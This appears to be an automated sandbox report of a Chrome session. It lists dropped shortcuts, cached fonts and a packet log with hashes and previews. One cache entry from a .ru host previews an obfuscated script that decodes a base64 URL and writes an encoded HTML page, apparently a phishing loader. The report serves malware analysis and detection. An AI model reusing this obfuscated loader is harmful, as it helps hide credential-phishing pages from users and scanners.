                  SHA1:0CCFFF6D236170B2883BEA5D37E8D2DEDABEF232
                  SHA-256:CA0EA114CE1EBEA695F514641D3E34E4F755D72A79C12C7323578B4D685F0C69
                  SHA-512:CAE9A11B3040A8FA3636BC0B54BDB17EF18E039A1C22015A4165F7E6F43892974439E82D0F9CE334CC5C7DA232992B2BADAD0AA121FC67C499DAA66AFDF1E4D5
                  Malicious:false
                  Reputation:low
                  Preview:L..................F.@.. ...$+.,....x..Q....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.ISZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VSZ.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VSZ.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VSZ............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VSZ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............Y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2689
                  Entropy (8bit):4.010069394106156
                  Encrypted:false
                  SSDEEP:48:8FdwT0gAHIUidAKZdA14meh7sFiZUkmgqeh7suy+BX:8ofQnsy
                  MD5:14820F6589AA6A82AEA0AB16524ADD5E
                  SHA1:E3B8A4FD8677A942ABD8A835FD738772F86BBD1E
                  SHA-256:938F42227ECA3FC0D6E000A8D66E43480BFE512A04A59BC89788ABC8E586EE8B
                  SHA-512:FDD0197E1B6BEE5D1BF2AD5D5EB16191757C799723254E65100CD7C3BE97A9839CF60B82EAD42537103690660847C1A8FD6CBB7D10A4CEC10B1C3630F244A2B3
                  Malicious:false
                  Reputation:low
                  Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.ISZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VSZ.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VSZ.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VSZ............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............Y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 19 17:23:05 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2677
                  Entropy (8bit):4.001408243022035
                  Encrypted:false
                  SSDEEP:48:8P9dwT0gdHIUidAKZdA1TehDiZUkwqehUy+R:8PAf42y
                  MD5:0D11E44CA12DFC97BBBB299A7F19418A
                  SHA1:F8488D78DF9D36707A61C004DA08844315DC725E
                  SHA-256:C839F0A2C64915226EE1979780DCCAC5E2D2F1B953EBF0A85AA4B155114A97D8
                  SHA-512:F0672B0E05FCF83E9562E86C02B05D9580B9E199E3B2837596163AF111D4C8971949E23D51282406BD8BEED036A4E1BF776CEA06BC9AF69FFDEB6D43BBD19610
                  Malicious:false
                  Reputation:low
                  Preview:L..................F.@.. ...$+.,....E..Q....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.ISZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VSZ.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VSZ.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VSZ............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VSZ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............Y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 19 17:23:05 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2677
                  Entropy (8bit):3.98962953690191
                  Encrypted:false
                  SSDEEP:48:8jdwT0gdHIUidAKZdA1dehBiZUk1W1qehqy+C:8OfI9Ky
                  MD5:0F2F71D84945FFB4F85E6348F78B54E5
                  SHA1:E030EA5BDA67174A23D8FBA35A89BCDAF93C4438
                  SHA-256:1F0D35981437C630D2AFD45193AC691FB79F411AFD843949EC53B1906A2EA501
                  SHA-512:F7306BAA9C09361BA9D44926B68D629E239EE62CC6448AD6299341FC2B57E5646C883985C03CCFA0A73D7BA1261D9A3A87BD333E1B1B6F21410FE76A918CE3DA
                  Malicious:false
                  Reputation:low
                  Preview:L..................F.@.. ...$+.,....).Q....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.ISZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VSZ.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VSZ.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VSZ............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VSZ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............Y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 19 17:23:05 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2679
                  Entropy (8bit):4.002916282745637
                  Encrypted:false
                  SSDEEP:48:8GdwT0gdHIUidAKZdA1duTeehOuTbbiZUk5OjqehOuTbsy+yT+:8hf6TfTbxWOvTbsy7T
                  MD5:2F50992E24A5DB19C87FD726301F18CD
                  SHA1:C714F96998446E541DD3B824196799C43EB68E1E
                  SHA-256:9AE8DDA186E58C55EA3B9FCC09D71C3A4FB1DDEBDF94A3127283A0FC92B94869
                  SHA-512:FAB7DF6982F0294C8C8149F478A16450140F58FF9B2384D727884D963644D42F14DB47763DE3D821A79DA077D8CEB0DD79C68228483845B0E8BD1416FD7DAD6A
                  Malicious:false
                  Reputation:low
                  Preview:L..................F.@.. ...$+.,......Q....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.ISZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VSZ.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VSZ.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VSZ............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VSZ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............Y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  Chrome Cache Entry: 59

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (1572)
                  Category:downloaded
                  Size (bytes):16755
                  Entropy (8bit):5.275971833003547
                  Encrypted:false
                  SSDEEP:384:pCf5CgCPCrCyUC/qY4+C4CYCpCfMC1CWC6CyhC/qY4XCNCtCiCfDCOCdCBCyaC/j:pKhOoJUaRbn07Un9JhaEqOrELg2Jaa77
                  MD5:318E394CCD19CC3651A0F3ADFD1A447A
                  SHA1:C4F6B0745412FD11E753BCFF94C5A8B8201A1B80
                  SHA-256:FC3A0A9B74CC30A1F95D2A61B6CCB6A3D2F6F48B5C0064DDC1F772A3BE196013
                  SHA-512:BED855FB54ED28E60EBC11BC71FDB22D11322AB7E8511E5E9E69214F1C85A8B1790B7665136146FB000BD4AD0E236A729393523BC99588CBBBEF549339D3E1DF
                  Malicious:false
                  Reputation:low
                  URL:https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500&display=swap
                  Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-fam

                  Chrome Cache Entry: 60

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), TrueType, length 40128, version 1.0
                  Category:downloaded
                  Size (bytes):40128
                  Entropy (8bit):7.994526034157349
                  Encrypted:true
                  SSDEEP:768:Vce3jkow68wmT4IBX0tXdlSirS61gSjcz0GPwHbP+w2jec56O:VcI/iEEEtXdFJj+0GPwHbP+w5rO
                  MD5:9A01B69183A9604AB3A439E388B30501
                  SHA1:8ED1D59003D0DBE6360481017B44665153665FBE
                  SHA-256:20B535FA80C8189E3B87D1803038389960203A886D502BC2EF1857AFFC2F38D2
                  SHA-512:0E6795255B6EEA00B5403FD7E3B904D52776D49AC63A31C2778361262883697943AEDCB29FEEE85694BA6F19EAA34DDDB9A5BFE7118F4A25B4757E92C331FECA
                  Malicious:false
                  Reputation:low
                  URL:https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2
                  Preview:wOF2..............$....F..........................p.....t?HVAR...`?STAT.N'...B..~.../~.....`..i..X.0..j.6.$..,. .... ..N[{.q.v...Lw.Q..o..J...6.Z.g.F.n..g\{t....%.!3)....sS.o...$."c.^<.iZc.I]c....0+. ..I..9.H.3..B.&.....'e....5.p.R(.j~\=..Wt.{..1.[u..Fn..<.-g.3..L..o.....E.-Q.........I..-/.4....{.Uj...3.K...g.Z....0...2)%.{......gN.../f.7....o.K....^V...!j...<...gf....\XjI.<p.PJh.4....*,*.S....&.C...R..,@ba..<..z.|.X.&.(.mf.w[..l.35Mp...A.A.=d........fj...}W6..y....[...i.......!........NLND....n'"...N*k)0<n.P.......w.j..>9.vV...Z.`.$$!.".(.`ATV.,..0.]3.<.d(...-s...2.w....P@.&...-.9x7.'....Sg.N=m.=....(..))-bA<.x.......=@4qs..Ss......K...{.=H.......z...NUS....Y..6.K.......n.....F4.B....=w.....+..F3...fB..........y1...,.(...`,..&vIrP.^.fiQY..5....H.a......q...s."..\..':.xK}...fU.z.j.......$L.......f.g&....R...!.Wmew3.1%2W.'"6u..r.q"F.......~i{..9xN.g.X..NMx.H.s@.8..J.t.SP.C`-GU)G/'..6".+......f..n..Aw....r....l.<r...Cke..D....T/."..c..mj..

                  Chrome Cache Entry: 61

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:low
                  Preview:1

                  Chrome Cache Entry: 62

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:very short file (no magic)
                  Category:downloaded
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:low
                  URL:https://fel.oustiono.ru/loray!cb32fi
                  Preview:1

                  Chrome Cache Entry: 63

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (65306)
                  Category:downloaded
                  Size (bytes):556664
                  Entropy (8bit):3.755899867938059
                  Encrypted:false
                  SSDEEP:768:guUdJCe9jbH0J7oenLDuUdJCe9jbH0J7oenLYyLkK93aLkK93T:gukJCC7nenLDukJCC7nenLYyLBxaLBxT
                  MD5:0259BC29B288E6E5D20AA3044E960FF0
                  SHA1:6629ACF402E50D42915FF3A125FC66663D9D8261
                  SHA-256:934E04BCD5C5616B688F2FB9E41FD4B4134FFA9472C48C2A8D47C3AA2DD3D393
                  SHA-512:44E4C8FAEBE77CDAA13CF02B1BB6E53F27717FF2D8E108052F840605A45503EFA1D4173E4C88E2A1184FE1E0B5B9C9AC1EE56FB877434986B902FD51910F70C4
                  Malicious:false
                  Reputation:low
                  URL:https://7pj1.chuseruc.ru/Idsj/
                  Preview:<script>./* Success is not final, failure is not fatal: It is the courage to continue that counts. */.QLUeRYQGdx = atob("aHR0cHM6Ly82YzVhLmNodXNlcnVjLnJ1L0lkc2ov");.kgcdiQdFSA = atob("bm9tYXRjaA==");.if(QLUeRYQGdx == kgcdiQdFSA){.document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPjxoZWFkPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPgogICAgPHN0eWxlPgogICAgICAgIGJvZHksIGh0bWwgewogICAgICAgICAgICBtYXJnaW46IGF1dG87CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgc2Fucy1zZXJpZjsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjMpOwogICAgICAgIH0KCiAgICAgICAgKnstd2Via2l0LXRhcC1oaWdobGlnaHQtY29sb3I6dHJhbnNwYXJlbnQ7LXdlYmtpdC1mb250LXNtb290aGluZzphbnRpYWxpYXNlZH1ib2R5LGh0bWx7bWFyZ2luOjA7cGFkZGluZzowO2ZvbnQtZmFtaWx5Oi1hcHBsZS1zeXN0ZW0sc3lzdGVtLXVpLEJsaW5rTWFjU3lzdGVtRm9udCwiU2Vnb2UgVUkiLFJvYm90byxPeHlnZW4sVWJ1bnR1LCJIZWx2ZXRpY2EgTmV1ZSIsQXJpYWwsc2Fucy1zZXJpZjtvdmVyZmxvdzpoaWRkZW47aGVpZ2h0OjEwMCU7d2lkdGg6MTAwJTtiYWNrZ3JvdW5kLWNvbG9

                  Static File Info

                  No static file info

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Feb 19, 2025 19:22:58.718287945 CET4969080192.168.2.162.23.77.188
                  Feb 19, 2025 19:22:58.718295097 CET4968980192.168.2.16192.229.211.108
                  Feb 19, 2025 19:22:59.668157101 CET49673443192.168.2.16204.79.197.203
                  Feb 19, 2025 19:23:03.297285080 CET49678443192.168.2.1620.189.173.10
                  Feb 19, 2025 19:23:03.599941015 CET49678443192.168.2.1620.189.173.10
                  Feb 19, 2025 19:23:04.205830097 CET49678443192.168.2.1620.189.173.10
                  Feb 19, 2025 19:23:04.474813938 CET49673443192.168.2.16204.79.197.203
                  Feb 19, 2025 19:23:04.790020943 CET49710443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:04.790049076 CET44349710104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:04.790111065 CET49710443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:04.790416956 CET49710443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:04.790431976 CET44349710104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:04.798926115 CET49711443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:04.799027920 CET44349711104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:04.799139977 CET49711443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:04.799417019 CET49711443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:04.799448013 CET44349711104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.250205040 CET44349710104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.250499010 CET49710443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.250515938 CET44349710104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.251522064 CET44349710104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.251781940 CET49710443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.252713919 CET49710443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.252779961 CET44349710104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.252804995 CET49710443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.252804995 CET49710443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.252837896 CET49710443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.253240108 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.253353119 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.253451109 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.253601074 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.253627062 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.283677101 CET44349711104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.284048080 CET49711443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.284111023 CET44349711104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.285026073 CET44349711104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.285104990 CET49711443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.285418034 CET49711443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.285418034 CET49711443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.285451889 CET49711443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.285491943 CET44349711104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.285542965 CET49711443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.285729885 CET49714443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.285770893 CET44349714104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.286418915 CET49714443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.286674976 CET49714443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.286690950 CET44349714104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.410973072 CET49678443192.168.2.1620.189.173.10
                  Feb 19, 2025 19:23:05.721633911 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.722067118 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.722132921 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.723190069 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.723270893 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.724478006 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.724558115 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.724937916 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:05.724955082 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:05.773982048 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.019886017 CET44349714104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.020215034 CET49714443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.020241976 CET44349714104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.021688938 CET44349714104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.021744967 CET49714443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.022156954 CET49714443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.022238016 CET44349714104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.076828957 CET49714443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.076842070 CET44349714104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.124825954 CET49714443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.297688961 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.297765970 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.297789097 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.297815084 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.297842026 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.297880888 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.297907114 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.297938108 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.297966957 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.297966957 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.297966957 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.298042059 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.298095942 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.298162937 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.298216105 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.298233986 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.346951008 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.384601116 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.384684086 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.384716034 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.384744883 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.384833097 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.384860992 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.384877920 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.384877920 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.384888887 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.384951115 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.385015011 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.385015011 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.385242939 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.385332108 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.385361910 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.385391951 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.385392904 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.385407925 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.385464907 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.386248112 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.386297941 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.386327028 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.386346102 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.386357069 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.386385918 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.387118101 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.387168884 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.387173891 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.387186050 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.387238979 CET49713443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:06.472183943 CET44349713104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:06.472263098 CET44349713104.21.43.76192.168.2.16
